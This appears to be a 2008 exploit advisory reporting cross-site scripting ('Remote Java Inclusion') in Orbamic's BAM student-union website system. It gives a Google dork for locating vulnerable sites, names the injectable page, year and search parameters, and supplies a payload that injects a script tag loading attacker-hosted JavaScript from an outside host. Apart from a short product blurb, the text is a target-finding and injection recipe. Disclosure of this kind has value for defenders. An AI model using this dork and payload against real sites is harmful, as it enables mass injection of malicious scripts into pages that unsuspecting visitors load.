+==========================================================================================+
+          Copyright 2004/2008 - Orbamic  &  XSS - Remote Java Inclusion                   +
+==========================================================================================+


Author(s): Ivan Sanchez 

Product: © 2008 BAM - Student Marketing • All rights reserved worldwide • developed by orbamic


Web:http:www.sumarketing.co.uk

Versions: all version

Date: 01/10/2008


Through SUMarketing.co.uk BAM are providing both clients and student organisations with 
outlets for marketing and advertising collaboration.

No truer can be said than with BAM student marketing’s online student website system, 
which is in place to help University students unions develop their online services 
for their students from information and advice to fun.
 
The BAM student website system offers a number of new and exciting online student marketing opportunities 
as well as developing key sectors 
within the students union such as Local part time student jobs, graduate marketing 
& post graduate recruitment through.....




GOOGLE DORKS:
------------

"developed by orbamic"



Parameters Affected:
-------------------


1-(From , querystring)

page=insert-evil-remote-java.js


2-(From querystring /calendar)

year=insert-evil-remote-java.js       ------------- >   index.php?page=day&day=18&month=09&year=insert-evil-remote-java.js


3-(From, Post)

search=insert-evil-remote-java.js


(and other parameters are affected.)


Example insert insane code:  "><script src=http://site/scripts/evil.js></script> 





            NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+==========================================================================================+
+          Copyright 2004/2008 - orbamic  &  XSS - Remote Java Inclusion                   +
+==========================================================================================+